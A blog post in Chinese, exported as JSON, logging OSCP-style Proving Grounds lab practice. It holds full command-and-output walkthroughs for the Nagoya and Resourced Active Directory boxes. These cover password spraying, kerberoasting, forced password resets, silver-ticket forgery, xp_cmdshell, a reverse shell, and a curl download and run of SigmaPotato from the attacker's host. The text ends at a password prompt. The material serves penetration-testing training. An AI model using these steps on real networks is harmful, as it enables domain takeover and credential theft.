{"id":126,"date":"2025-04-15T20:33:07","date_gmt":"2025-04-15T12:33:07","guid":{"rendered":"https:\/\/chengyunpu.com\/wordpress\/?p=126"},"modified":"2026-02-01T17:44:41","modified_gmt":"2026-02-01T09:44:41","slug":"lainkusanagi-oscp-like-proving-grounds-practice","status":"publish","type":"post","link":"https:\/\/chengyunpu.com\/wordpress\/2025\/04\/15\/lainkusanagi-oscp-like-proving-grounds-practice\/","title":{"rendered":"Lainkusanagi OSCP Like & TJ Null list – Proving Grounds Practice"},"content":{"rendered":"\n

Lainkusanagi OSCP Like<\/h3>\n\n\n\n
Linux<\/td>Windows<\/td>Windows Active Directory<\/td><\/tr>
ClamAV (Pwned)<\/td>Kevin (Pwned)<\/td>Access (Pwned)<\/td><\/tr>
Pelican (Pwned)<\/td>Internal (Pwned)<\/td>Resourced (Pwned)<\/td><\/tr>
Payday (Pwned)<\/td>Algernon (Pwned)<\/td>Nagoya (Pwned)<\/td><\/tr>
Snookums (Pwned)<\/td>Jacko (Pwned)<\/td>Hokkaido (Pwned)<\/td><\/tr>
Bratarina (Pwned)<\/td>Craft (Pwned)<\/td>Hutch (Pwned)<\/td><\/tr>
Pebbles (Pwned)<\/td>Squid (Pwned)<\/td>Vault (Pwned)<\/td><\/tr>
Nibbles (Pwned)<\/td>Nickel (Pwned)<\/td><\/td><\/tr>
Hetemit (Pwned)<\/td>MedJed (Pwned)<\/td><\/td><\/tr>
ZenPhoto (Pwned)<\/td>Billyboss(Pwned)<\/td><\/td><\/tr>
Nukem (Pwned)<\/td>Shenzi (Pwned)<\/td><\/td><\/tr>
Cockpit (Pwned)<\/td>AuthBy (Pwned)<\/td><\/td><\/tr>
Clue (Pwned)<\/td>Slort (Pwned)<\/td><\/td><\/tr>
Extplorer (Pwned)<\/td>Hepet (Pwned)<\/td><\/td><\/tr>
Postfish (local)<\/td>DVR4 (Pwned)<\/td><\/td><\/tr>
Hawat (Pwned)<\/td>Mice (Pwned)<\/td><\/td><\/tr>
Walla (Pwned)<\/td>Monster (Pwned)<\/td><\/td><\/tr>
PC (Pwned)<\/td>Fish (Pwned)<\/td><\/td><\/tr>
Apex (Pwned)<\/td><\/td><\/td><\/tr>
Sorcerer (Pwned)<\/td><\/td><\/td><\/tr>
Sybaris (Pwned)<\/td><\/td><\/td><\/tr>
Peppo (Pwned)<\/td><\/td><\/td><\/tr>
Hunit (local)<\/td><\/td><\/td><\/tr>
Readys (Pwned)<\/td><\/td><\/td><\/tr>
Astronaut (Pwned)<\/td><\/td><\/td><\/tr>
Bullybox (Pwned)<\/td><\/td><\/td><\/tr>
Marketing (local)<\/td><\/td><\/td><\/tr>
Exfiltrated (Pwned)<\/td><\/td><\/td><\/tr>
Fanatastic (Pwned)<\/td><\/td><\/td><\/tr>
QuackerJack (Pwned)<\/td><\/td><\/td><\/tr>
Wombo (Pwned)<\/td><\/td><\/td><\/tr>
Flu (Pwned)<\/td><\/td><\/td><\/tr>
Roquefort (Pwned)<\/td><\/td><\/td><\/tr>
Levram (Pwned)<\/td><\/td><\/td><\/tr>
Mzeeav (Pwned)<\/td><\/td><\/td><\/tr>
LaVita (Pwned)<\/td><\/td><\/td><\/tr>
Xposedapi (Pwned)<\/td><\/td><\/td><\/tr>
Zipper (Pwned)<\/td><\/td><\/td><\/tr>
Ochima (Pwned)<\/td><\/td><\/td><\/tr>
Fired (Pwned)<\/td><\/td><\/td><\/tr>
Scrutiny (Pwned)<\/td><\/td><\/td><\/tr>
SPX(Pwned)<\/td><\/td><\/td><\/tr>
Vmdak (Pwned)<\/td><\/td><\/td><\/tr>
Mantis<\/td><\/td><\/td><\/tr>
BitForge (Pwned)<\/td><\/td><\/td><\/tr>
WallpaperHub<\/td><\/td><\/td><\/tr>
Zab<\/td><\/td><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

NetSecFocus Trophy Room<\/h3>\n\n\n\n
Linux Boxes:<\/td>Windows Boxes:<\/td>Windows Active Directory Boxes:<\/td><\/tr>
Twiggy (Pwned)<\/td>Helpdesk<\/td>Access (Pwned)<\/td><\/tr>
Exfiltrated (Pwned)<\/td>Algernon (Pwned)<\/td>Heist (Pwned)<\/td><\/tr>
Pelican (Pwned)<\/td>Authby (Pwned)<\/td>Vault (Pwned)<\/td><\/tr>
Astronaut (Pwned)<\/td>Craft (Pwned)<\/td>Nagoya (Pwned)<\/td><\/tr>
Blackgate (Pwned)<\/td>Hutch (Pwned)<\/td>Hokkaido (Pwned)<\/td><\/tr>
Boolean (Pwned)<\/td>Internal (Pwned)<\/td>Resourced (Pwned)<\/td><\/tr>
Clue (Pwned)<\/td>Jacko (Pwned)<\/td>Hutch (Pwned)<\/td><\/tr>
Cockpit (Pwned)<\/td>Kevin (Pwned)<\/td><\/td><\/tr>
Codo (Pwned)<\/td>Resourced (Pwned)<\/td><\/td><\/tr>
Crane (Pwned)<\/td>Squid (Pwned)<\/td><\/td><\/tr>
Levram (Pwned)<\/td>DVR4 (Pwned)<\/td><\/td><\/tr>
Extplore (Pwned)<\/td>Hepet (Pwned)<\/td><\/td><\/tr>
Hub (Pwned)<\/td>Shenzi (Pwned)<\/td><\/td><\/tr>
Image (Pwned)<\/td>Nickel (Pwned)<\/td><\/td><\/tr>
law (Pwned)<\/td>Slort (Pwned)<\/td><\/td><\/tr>
Lavita (Pwned)<\/td>MedJed (Pwned)<\/td><\/td><\/tr>
PC (Pwned)<\/td><\/td><\/td><\/tr>
Fired (Pwned)<\/td><\/td><\/td><\/tr>
Press (Pwned)<\/td><\/td><\/td><\/tr>
Scrutiny (Pwned)<\/td><\/td><\/td><\/tr>
RubyDome (Pwned)<\/td><\/td><\/td><\/tr>
Zipper (Pwned)<\/td><\/td><\/td><\/tr>
Flu (Pwned)<\/td><\/td><\/td><\/tr>
Ochima (Pwned)<\/td><\/td><\/td><\/tr>
PyLoader (Pwned)<\/td><\/td><\/td><\/tr>
Plum (Pwned)<\/td><\/td><\/td><\/tr>
SPX (Pwned)<\/td><\/td><\/td><\/tr>
Jordak (Pwned)<\/td><\/td><\/td><\/tr>
BitForge(Pwned)<\/td><\/td><\/td><\/tr>
Vmdak (Pwned)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

<\/p>\n\n\n\n

Nagoya<\/h2>\n\n\n\n

Service Enumeration<\/h3>\n\n\n\n

Port Scan Results<\/strong><\/p>\n\n\n\n

Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.188.21 <\/td>TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

\u7db2\u7ad9 \/Team \u6709\u4e00\u5217 user \u540d\u55ae\uff0c\u52a0\u4e0a\u6709\u958b 88 port \u3002\u628a\u7db2\u7ad9\u7684 users \u6284\u4e0b\u4f86\uff0c\u518d\u751f\u6210\u9019\u4e9b user \u5728 domain \u4e2d\u53ef\u80fd\u7684 user name<\/p>\n\n\n\n

\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ cat users.list                                         \nMatthew Harrison\nEmma Miah\nRebecca Bell\nScott Gardner\nTerry Edwards\nHolly Matthews\nAnne Jenkins\nBrett Naylor\nMelissa Mitchell\nCraig Carr\nFiona Clark\nPatrick Martin\nKate Watson\nKirsty Norris\nAndrea Hayes\nAbigail Hughes\nMelanie Watson\nFrances Ward\nSylvia King\nWayne Hartley\nIain White\nJoanna Wood\nBethan Webster\nElaine Brady\nChristopher Lewis\nMegan Johnson\nDamien Chapman\nJoanne Lewis\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ python2 ~\/tools\/usernamer.py -f users.list > users.test\n<\/code><\/pre>\n\n\n\n
\u679a\u8209 users<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ kerbrute userenum --dc 192.168.188.21 -d nagoya-industries.com users.test \n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: dev (n\/a) - 07\/14\/25 - Ronnie Flathers @ropnop\n\n2025\/07\/14 03:48:12 >  Using KDC(s):\n2025\/07\/14 03:48:12 >   192.168.188.21:88\n\n2025\/07\/14 03:48:12 >  [+] VALID USERNAME:       Matthew.Harrison@nagoya-industries.com\n2025\/07\/14 03:48:14 >  [+] VALID USERNAME:       Emma.Miah@nagoya-industries.com\n2025\/07\/14 03:48:15 >  [+] VALID USERNAME:       Rebecca.Bell@nagoya-industries.com\n2025\/07\/14 03:48:16 >  [+] VALID USERNAME:       Scott.Gardner@nagoya-industries.com\n2025\/07\/14 03:48:18 >  [+] VALID USERNAME:       Terry.Edwards@nagoya-industries.com\n2025\/07\/14 03:48:18 >  [+] VALID USERNAME:       Holly.Matthews@nagoya-industries.com\n2025\/07\/14 03:48:20 >  [+] VALID USERNAME:       Anne.Jenkins@nagoya-industries.com\n2025\/07\/14 03:48:22 >  [+] VALID USERNAME:       Brett.Naylor@nagoya-industries.com\n2025\/07\/14 03:48:23 >  [+] VALID USERNAME:       Melissa.Mitchell@nagoya-industries.com\n2025\/07\/14 03:48:24 >  [+] VALID USERNAME:       Craig.Carr@nagoya-industries.com\n2025\/07\/14 03:48:25 >  [+] VALID USERNAME:       Fiona.Clark@nagoya-industries.com\n2025\/07\/14 03:48:26 >  [+] VALID USERNAME:       Patrick.Martin@nagoya-industries.com\n2025\/07\/14 03:48:27 >  [+] VALID USERNAME:       Kate.Watson@nagoya-industries.com\n2025\/07\/14 03:48:29 >  [+] VALID USERNAME:       Kirsty.Norris@nagoya-industries.com\n2025\/07\/14 03:48:29 >  [+] VALID USERNAME:       Andrea.Hayes@nagoya-industries.com\n2025\/07\/14 03:48:31 >  [+] VALID USERNAME:       Abigail.Hughes@nagoya-industries.com\n2025\/07\/14 03:48:33 >  [+] VALID USERNAME:       Melanie.Watson@nagoya-industries.com\n2025\/07\/14 03:48:34 >  [+] VALID USERNAME:       Frances.Ward@nagoya-industries.com\n2025\/07\/14 03:48:35 >  [+] VALID USERNAME:       Sylvia.King@nagoya-industries.com\n2025\/07\/14 03:48:37 >  [+] VALID USERNAME:       Wayne.Hartley@nagoya-industries.com\n2025\/07\/14 03:48:37 >  [+] VALID USERNAME:       Iain.White@nagoya-industries.com\n2025\/07\/14 03:48:38 >  [+] VALID USERNAME:       Joanna.Wood@nagoya-industries.com\n2025\/07\/14 03:48:39 >  [+] VALID USERNAME:       Bethan.Webster@nagoya-industries.com\n2025\/07\/14 03:48:41 >  [+] VALID USERNAME:       Elaine.Brady@nagoya-industries.com\n2025\/07\/14 03:48:43 >  [+] VALID USERNAME:       Christopher.Lewis@nagoya-industries.com\n2025\/07\/14 03:48:44 >  [+] VALID USERNAME:       Megan.Johnson@nagoya-industries.com\n2025\/07\/14 03:48:46 >  [+] VALID USERNAME:       Damien.Chapman@nagoya-industries.com\n2025\/07\/14 03:48:46 >  [+] VALID USERNAME:       Joanne.Lewis@nagoya-industries.com\n2025\/07\/14 03:48:47 >  Done! Tested 3318 usernames (28 valid) in 35.604 seconds<\/code><\/pre>\n\n\n\n
\u767c\u73fe\u898f\u5f8b\uff0c\u5beb\u4e00\u500b script \u6574\u7406\u597d user name<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ cat script.py \nwith open('users.list','r') as list:\n    txt=list.read()\n    for i in txt:\n        print(i.replace(' ','.'),end='')\n                                                                                                                                                                                                                                                     \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ python3 script.py > users<\/code><\/pre>\n\n\n\n
\u4e4b\u5f8c\u7ffb WP \u767c\u73fe\u5f88\u591a\u4eba\u90fd\u5beb\u56e0\u70ba\u9019\u53f0\u662f 2023 \u590f\u5929\u767c\u5e03\u7684\u6240\u4ee5\u6709\u4e00\u7d44\u5bc6\u78bc\u662f  Summer2023<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ nxc smb 192.168.186.21 -u users -p Summer2023 --continue-on-success | grep +  \nSMB                      192.168.186.21  445    NAGOYA           [+] nagoya-industries.com\\Fiona.Clark:Summer2023 <\/code><\/pre>\n\n\n\n
\u627e\u5230\u8a72\u5bc6\u78bc\u662f Fiona.Clark \u7684<\/p>\n\n\n\n
kerberoasting \u4e26\u7834\u89e3 hash \u5f97\u5230 svc_mssql\/Service1<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ impacket-GetUserSPNs -request -dc-ip '192.168.186.21' 'nagoya-industries.com'\/'Fiona.Clark':'Summer2023' -outputfile hashes.kerberoast\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nServicePrincipalName                Name          MemberOf                                          PasswordLastSet             LastLogon                   Delegation \n----------------------------------  ------------  ------------------------------------------------  --------------------------  --------------------------  ----------\nhttp\/nagoya.nagoya-industries.com   svc_helpdesk  CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com  2023-04-30 03:31:06.190955  <never>                                \nMSSQL\/nagoya.nagoya-industries.com  svc_mssql                                                       2023-04-30 03:45:33.288595  2024-08-01 21:48:41.441299             \n\n\n\n[-] CCache file is not found. Skipping...<\/code><\/pre>\n\n\n\n
\u62ff\u5230\u7684 Fiona.Clark \u6709\u6b0a\u9650\u66f4\u6539 JOANNA.WOOD \u5bc6\u78bc\uff0cJOANNA.WOOD \u6709\u6b0a\u9650\u66f4\u6539 CHRISTOPHER.LEWIS \u5bc6\u78bc\uff0cCHRISTOPHER.LEWIS
\u6709\u6b0a\u9650 winrm \u767b\u5165 DC<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ bloodyAD --host '192.168.186.21' -d 'nagoya-industries.com' -u 'Fiona.Clark' -p 'Summer2023' set password JOANNA.WOOD 'P@$$w0rd'\n[+] Password changed successfully!\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ bloodyAD --host '192.168.186.21' -d 'nagoya-industries.com' -u 'JOANNA.WOOD' -p 'P@$$w0rd' set password CHRISTOPHER.LEWIS 'P@$$w0rd'\n[+] Password changed successfully!<\/code><\/pre>\n\n\n\n
\u5df2 CHRISTOPHER.LEWIS \u767b\u5165\u5f8c\u767c\u73fe\u6709\u958b mssql \uff0c\u9806\u4fbf\u505a pivoting \u4ee5\u4fbf\u5b58\u53d6 mssql <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ evil-winrm -u 'CHRISTOPHER.LEWIS' -p 'P@$$w0rd' -i '192.168.170.21'\n                                        \nEvil-WinRM shell v3.7\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline\n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> netstat -ano | findstr 1433\n  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       4372\n  TCP    [::]:1433              [::]:0                 LISTENING       4372\n*Evil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> upload ..\/..\/..\/..\/..\/..\/home\/kali\/tools\/ligolo\/agent.exe\n                                        \nInfo: Uploading \/home\/kali\/oscp\/pg\/Nagoya\/..\/..\/..\/..\/..\/..\/home\/kali\/tools\/ligolo\/agent.exe to C:\\Users\\Christopher.Lewis\\Documents\\agent.exe\n                                        \nData: 8925864 bytes of 8925864 bytes copied\n                                        \nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> .\\agent.exe -connect 192.168.45.236:443 -ignore-cert\nagent.exe : time=\"2025-08-09T02:07:21-07:00\" level=warning msg=\"warning, certificate validation disabled\"\n    + CategoryInfo          : NotSpecified: (time=\"2025-08-0...ation disabled\":String) [], RemoteException\n    + FullyQualifiedErrorId : NativeCommandError\ntime=\"2025-08-09T02:07:21-07:00\" level=info msg=\"Connection established\" addr=\"192.168.45.236:443\"<\/code><\/pre>\n\n\n\n
\u4f46\u662f\u62ff\u5230\u7684 svc_mssql \u6c92\u6709\u6b0a\u9650\u57f7\u884c xp_cmdshell<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ nxc mssql '240.0.0.1' -u 'svc_mssql' -p 'Service1' -x whoami \nMSSQL       240.0.0.1       1433   NAGOYA           [*] Windows 10 \/ Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)\nMSSQL       240.0.0.1       1433   NAGOYA           [+] nagoya-industries.com\\svc_mssql:Service1<\/code><\/pre>\n\n\n\n
\u70ba\u4e86\u80fd\u6709\u6b0a\u9650\u958b\u555f xp_cmdshell \uff0c\u4f7f\u7528 Silver Ticket attack \u507d\u9020\u6210 administrator \u7684\u6b0a\u9650\u53bb\u5b58\u53d6 mssql<\/p>\n\n\n\n
#\u53d6\u5f97 domain SID\nEvil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> (Get-ADDomain).DomainSID.Value\nS-1-5-21-1969309164-1513403977-1686805993\n\n# \u5728 bloodhound \u4e0a\u53d6\u5f97\u76ee\u6a19\u670d\u52d9 SPN\nMSSQL\/nagoya.nagoya-industries.com\n\n# \u5df2\u7684 svc_mssql nt hash\ne3a0168bc21cfb88b95c954a5b18f57c<\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ impacket-ticketer -nthash e3a0168bc21cfb88b95c954a5b18f57c -spn 'MSSQL\/nagoya.nagoya-industries.com' -domain nagoya-industries.com -domain-sid S-1-5-21-1969309164-1513403977-1686805993 administrator\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for nagoya-industries.com\/administrator\n[*]     PAC_LOGON_INFO\n[*]     PAC_CLIENT_INFO_TYPE\n[*]     EncTicketPart\n[*]     EncTGSRepPart\n[*] Signing\/Encrypting final ticket\n[*]     PAC_SERVER_CHECKSUM\n[*]     PAC_PRIVSVR_CHECKSUM\n[*]     EncTicketPart\n[*]     EncTGSRepPart\n[*] Saving ticket in administrator.ccache\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ export KRB5CCNAME=$(pwd)\/administrator.ccache\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ klist                                    \nTicket cache: FILE:\/home\/kali\/oscp\/pg\/Nagoya\/administrator.ccache\nDefault principal: administrator@NAGOYA-INDUSTRIES.COM\n\nValid starting       Expires              Service principal\n08\/09\/2025 05:29:43  08\/07\/2035 05:29:43  MSSQL\/nagoya.nagoya-industries.com@NAGOYA-INDUSTRIES.COM\n        renew until 08\/07\/2035 05:29:43<\/code><\/pre>\n\n\n\n
\u66f4\u6539 \/etc\/krb5.conf \uff0c\u4e26\u6dfb\u52a0 \/etc\/hosts domain \u548c dc \u6307\u5411 240.0.0.1 <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ cat \/etc\/krb5.conf\n[libdefaults]\n    default_realm = NAGOYA-INDUSTRIES.COM\n    dns_lookup_realm = false\n    dns_lookup_kdc = false\n\n[realms]\n    NAGOYA-INDUSTRIES.COM = {\n        kdc = 240.0.0.1\n    }\n\n[domain_realm]\n    .nagoya-industries.com = NAGOYA-INDUSTRIES.COM\n    nagoya-industries.com = NAGOYA-INDUSTRIES.COM<\/code><\/pre>\n\n\n\n
\u6210\u529f\u5df2 administrator \u7684\u6b0a\u9650\u4f7f\u7528 mssql \u5f8c\uff0c\u958b\u555f xp_cmdshell\uff0c\u4e26\u4e14\u78ba\u5b9a\u6709 SeImpersonatePrivilege \u53ef\u4ee5\u63d0\u6b0a<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ impacket-mssqlclient -k nagoya.nagoya-industries.com\n\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Encryption required, switching to TLS\n[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master\n[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english\n[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192\n[*] INFO(nagoya\\SQLEXPRESS): Line 1: Changed database context to 'master'.\n[*] INFO(nagoya\\SQLEXPRESS): Line 1: Changed language setting to us_english.\n[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) \n[!] Press help for extra shell commands\nSQL (NAGOYA-IND\\Administrator  dbo@master)> EXEC sp_configure 'Show Advanced Options', 1;\nINFO(nagoya\\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.\nSQL (NAGOYA-IND\\Administrator  dbo@master)> reconfigure;\nSQL (NAGOYA-IND\\Administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; \nINFO(nagoya\\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.\nSQL (NAGOYA-IND\\Administrator  dbo@master)> RECONFIGURE;\nSQL (NAGOYA-IND\\Administrator  dbo@master)> xp_cmdshell whoami \/priv\noutput                                                                             \n--------------------------------------------------------------------------------   \nNULL                                                                               \n\nPRIVILEGES INFORMATION                                                             \n\n----------------------                                                             \n\nNULL                                                                               \n\nPrivilege Name                Description                               State      \n\n============================= ========================================= ========   \n\nSeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   \n\nSeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   \n\nSeMachineAccountPrivilege     Add workstations to domain                Disabled   \n\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    \n\nSeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    \n\nSeImpersonatePrivilege        Impersonate a client after authentication Enabled    \n\nSeCreateGlobalPrivilege       Create global objects                     Enabled    \n\nSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled <\/code><\/pre>\n\n\n\n
\u4f7f\u7528 powershell revshell \u9023\u63a5\u51fa\u4f86\uff0c\u5229\u7528 SigmaPotato \u5c07 CHRISTOPHER.LEWIS \u52a0\u5165 administrators group <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.236] from (UNKNOWN) [192.168.170.21] 50333\nPS C:\\windows\\system32> cd ~\nPS C:\\Users\\svc_mssql> curl 192.168.45.236\/SigmaPotato.exe -o SigmaPotato.exe\nPS C:\\Users\\svc_mssql> .\\SigmaPotato.exe \"net localgroup administrators CHRISTOPHER.LEWIS \/add\"\n[+] Starting Pipe Server...\n[+] Created Pipe Name: \\\\.\\pipe\\SigmaPotato\\pipe\\epmapper\n[+] Pipe Connected!\n[+] Impersonated Client: NT AUTHORITY\\NETWORK SERVICE\n[+] Searching for System Token...\n[+] PID: 880 | Token: 0x744 | User: NT AUTHORITY\\SYSTEM\n[+] Found System Token: True\n[+] Duplicating Token...\n[+] New Token Handle: 1032\n[+] Current Command Length: 52 characters\n[+] Creating Process via 'CreateProcessAsUserW'\n[+] Process Started with PID: 4860\n\n[+] Process Output:\nThe command completed successfully.\n\n\nPS C:\\Users\\svc_mssql> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nagoya]\n\u2514\u2500$ evil-winrm -u 'CHRISTOPHER.LEWIS' -p 'P@$$w0rd' -i '192.168.170.21'\n                                        \nEvil-WinRM shell v3.7\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                                                          \n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> type C:\\users\\administrator\\desktop\\proof.txt\nee2e36e0d228e46b9394846052eafafb\n*Evil-WinRM* PS C:\\Users\\Christopher.Lewis\\Documents> <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Resourced<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.104.175<\/td>TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u900f\u904e enum4linux \u627e\u5230 domain users \uff0c\u4e26\u6d29\u6f0f\u4e86 V.Ventz \u5bc6\u78bc\u70ba HotelCalifornia194!<\/p>\n\n\n\n
 ======================================( Users on 192.168.104.175 )======================================\n                                                                                                                             \nindex: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer\/domain\nindex: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant       Name: (null)    Desc: Linear Algebra and crypto god\nindex: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg     Name: (null)    Desc: Blockchain expert\nindex: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer\/domain\nindex: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson      Name: (null)    Desc: Networking specialist\nindex: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null)    Desc: Frontend Developer\nindex: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account\nindex: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone  Name: (null)    Desc: SysAdmin\nindex: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason        Name: (null)    Desc: Ex IT admin\nindex: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker       Name: (null)    Desc: Backend Developer\nindex: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson     Name: (null)    Desc: Database Admin\nindex: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson      Name: (null)    Desc: Military Vet now cybersecurity specialist\nindex: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz        Name: (null)    Desc: New-hired, reminder: HotelCalifornia194!\n\nuser:[Administrator] rid:[0x1f4]\nuser:[Guest] rid:[0x1f5]\nuser:[krbtgt] rid:[0x1f6]\nuser:[M.Mason] rid:[0x44f]\nuser:[K.Keen] rid:[0x450]\nuser:[L.Livingstone] rid:[0x451]\nuser:[J.Johnson] rid:[0x452]\nuser:[V.Ventz] rid:[0x453]\nuser:[S.Swanson] rid:[0x454]\nuser:[P.Parker] rid:[0x455]\nuser:[R.Robinson] rid:[0x456]\nuser:[D.Durant] rid:[0x457]\nuser:[G.Goldberg] rid:[0x458]<\/code><\/pre>\n\n\n\n
SMB \u6709\u7279\u5225\u7684\u8cc7\u6599\u593e Password Audit \uff0c\u5176\u4e2d\u88e1\u9762\u7684 registry \u8cc7\u6599\u593e\u5167\u6709 system & securiy\uff0c\u4ee5\u53ca\u5728 Active Directory \u8cc7\u6599\u593e\u5167\u6709 ntds.dit<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ nxc smb '192.168.104.175' -u 'V.Ventz' -p 'HotelCalifornia194!' --shares\nSMB         192.168.104.175 445    RESOURCEDC       [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)\nSMB         192.168.104.175 445    RESOURCEDC       [+] resourced.local\\V.Ventz:HotelCalifornia194! \nSMB         192.168.104.175 445    RESOURCEDC       [*] Enumerated shares\nSMB         192.168.104.175 445    RESOURCEDC       Share           Permissions     Remark\nSMB         192.168.104.175 445    RESOURCEDC       -----           -----------     ------\nSMB         192.168.104.175 445    RESOURCEDC       ADMIN$                          Remote Admin\nSMB         192.168.104.175 445    RESOURCEDC       C$                              Default share\nSMB         192.168.104.175 445    RESOURCEDC       IPC$            READ            Remote IPC\nSMB         192.168.104.175 445    RESOURCEDC       NETLOGON        READ            Logon server share \nSMB         192.168.104.175 445    RESOURCEDC       Password Audit  READ            \nSMB         192.168.104.175 445    RESOURCEDC       SYSVOL          READ            Logon server share\n---\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Resourced]\n\u2514\u2500$ smbclient \/\/192.168.104.175\/Password\\ Audit -U V.Ventz\n\nPassword for 